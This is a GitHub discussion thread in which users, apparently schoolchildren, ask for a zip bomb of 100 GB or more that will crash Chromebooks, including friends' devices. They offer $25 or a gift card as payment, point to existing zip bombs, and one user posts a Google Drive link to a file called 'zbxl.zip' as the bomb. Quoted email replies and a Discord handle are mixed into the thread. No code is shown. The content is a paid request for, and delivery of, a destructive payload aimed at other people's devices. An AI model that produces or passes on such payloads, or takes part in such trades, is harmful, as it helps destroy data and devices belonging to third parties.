### DISCUSSION TITLE
Someone make me a at least 100 gb firecraker zip bomb

### DISCUSSION THREAD

**Discussion by v4pl** [3kh0/ext-remover#945] [Help JOIN TITANIUM NETWORK TO SHARE PLEASE] [answered]
Someone make me a at least 100 gb firecraker zip bomb for my chromebook. I want to destory my and my friends chromebook.

**Comment by v4pl** [comment]
Anyone one who makes one I will offer $25

**Reply by funkymokey** [reply, marked as answer]
Just use the ones posted in [this repo's](https://github.com/3kh0/ext-remover/discussions/386) comments (or the 300 yottabyte one)

**Reply by v4pl** [reply]
doesn't really work cause yyou have to like extract 1 by 1

**Comment by ilovetoucans** [comment]
just look up zip bomb downloads, either it is a zip bomb or just destroys their computer with viruses

**Comment by CGRmags** [comment]
@vaperbest are you still offering the $25? and can that be an xbox gift card ?

**Reply by v4pl** [reply]
ya that works if you do give me a working zip bomb for chromebook.

**Reply by CGRmags** [reply]
@vaperbest i will try to make it later

**Reply by CGRmags** [reply]
@vaperbest is the "firecracker" a specific thing or what does it do? and also is 1 terabyte ok ?

**Reply by v4pl** [reply]
um what does that mean? I just need one able to crash a chromebook and eazy enought to use also add me on discord it's vslashfr

**Reply by CGRmags** [reply]
i can do that lol i was confused

**Comment by CGRmags** [comment]
ok i can do that

On Fri, Mar 1, 2024 at 2:19 PM
V̶̛̼̰̰͓̲̞̤̝͕̝̱̯̠̲̍̉͗̾͗̂̒̃̈́͗̎͂͋̍̑͌́͋͝͝Ŝ̵̥̘̜̬̲͚͖̤̥̠̬̻̲͚̟̮̂͐͋̇͊̔́͋̋̾̃́̂́̾́̅̈́̍̑̈́͂̚͘͝ͅḺ̴̢̜̩͎̩͖͖̤̣̦̗̮͒͛̾̈́̐͋̍̇͑͐͂̄̄̊́͋͘̚͠A̴̡̢̛̻̪̙̝̙̤̫̞̳̥̱͉̫̰̤̹̤̟̯͖̥̠̳̥̍̊̈̓͂̊̋̔̊͑͛͋̈́͜͜ͅS̸̝͎͓̣̺͔͌̉͊̒̇H̶̲͔̺͚͉̠̤͔̙̝̲̏͒͆̉̇͜
***@***.***> wrote:

> um what does that mean? I just need one able to crash a chromebook and
> eazy enought to use also add me on discord it's vslashfr
>
> —
> Reply to this email directly, view it on GitHub
> <https://github.com/3kh0/ext-remover/discussions/945#discussioncomment-8648284>,
> or unsubscribe
> <https://github.com/notifications/unsubscribe-auth/BDXUJBEXOD2F33QHRXINW43YWD5ILAVCNFSM6AAAAABDXDFHISVHI2DSMVQWIX3LMV43SRDJONRXK43TNFXW4Q3PNVWWK3TUHM4DMNBYGI4DI>
> .
> You are receiving this because you commented.Message ID:
> ***@***.***>
>

-- 
NOTICE: This email message and/or its attachments may contain information 
that is confidential or restricted. It is intended only for the individuals 
named as recipients in the message. If you are NOT an authorized recipient, 
you are prohibited from using, delivering, distributing, printing, copying, 
or disclosing the message or content to others and must delete the message 
from your computer. If you have received this message in error, please 
notify the sender by return email.

**Reply by v4pl** [reply]
how long would it take?

**Reply by CGRmags** [reply]
@vaperbest maybe next week bc i have to do schoolwork  and weekend I have to go to my grandma house

**Reply by CGRmags** [reply]
@vaperbest if you want it sooner i can try

**Reply by CGRmags** [reply]
@vaperbest what is the preferred size of this zip bomb?

**Reply by v4pl** [reply]
Idk like anything that could actually crash a Chromebook for some time and would be easy to use.

**Reply by CGRmags** [reply]
ok i will put it on here when I have it

**Reply by CGRmags** [reply]
@vaperbest i sent  a friend request just now

**Reply by CGRmags** [reply]
@vaperbest it CGRmags

**Comment by CGRmags** [comment]
Here is the bomb
 zbxl.zip
<https://drive.google.com/file/d/1Aw_QPJ_gV9ggexpnmwNR9ncrDMzwy11u/view?usp=drive_web>


On Fri, Mar 1, 2024 at 5:15 PM
V̶̛̼̰̰͓̲̞̤̝͕̝̱̯̠̲̍̉͗̾͗̂̒̃̈́͗̎͂͋̍̑͌́͋͝͝Ŝ̵̥̘̜̬̲͚͖̤̥̠̬̻̲͚̟̮̂͐͋̇͊̔́͋̋̾̃́̂́̾́̅̈́̍̑̈́͂̚͘͝ͅḺ̴̢̜̩͎̩͖͖̤̣̦̗̮͒͛̾̈́̐͋̍̇͑͐͂̄̄̊́͋͘̚͠A̴̡̢̛̻̪̙̝̙̤̫̞̳̥̱͉̫̰̤̹̤̟̯͖̥̠̳̥̍̊̈̓͂̊̋̔̊͑͛͋̈́͜͜ͅS̸̝͎͓̣̺͔͌̉͊̒̇H̶̲͔̺͚͉̠̤͔̙̝̲̏͒͆̉̇͜
***@***.***> wrote:

> Idk like anything that could actually crash a Chromebook for some time and
> would be easy to use.
>
> —
> Reply to this email directly, view it on GitHub
> <https://github.com/3kh0/ext-remover/discussions/945#discussioncomment-8649124>,
> or unsubscribe
> <https://github.com/notifications/unsubscribe-auth/BDXUJBAZYSKC7RDJUUVOWLTYWER3HAVCNFSM6AAAAABDXDFHISVHI2DSMVQWIX3LMV43SRDJONRXK43TNFXW4Q3PNVWWK3TUHM4DMNBZGEZDI>
> .
> You are receiving this because you commented.Message ID:
> ***@***.***>
>

-- 
NOTICE: This email message and/or its attachments may contain information 
that is confidential or restricted. It is intended only for the individuals 
named as recipients in the message. If you are NOT an authorized recipient, 
you are prohibited from using, delivering, distributing, printing, copying, 
or disclosing the message or content to others and must delete the message 
from your computer. If you have received this message in error, please 
notify the sender by return email.

**Reply by CGRmags** [reply]
@vaperbest send me the gift card in discord
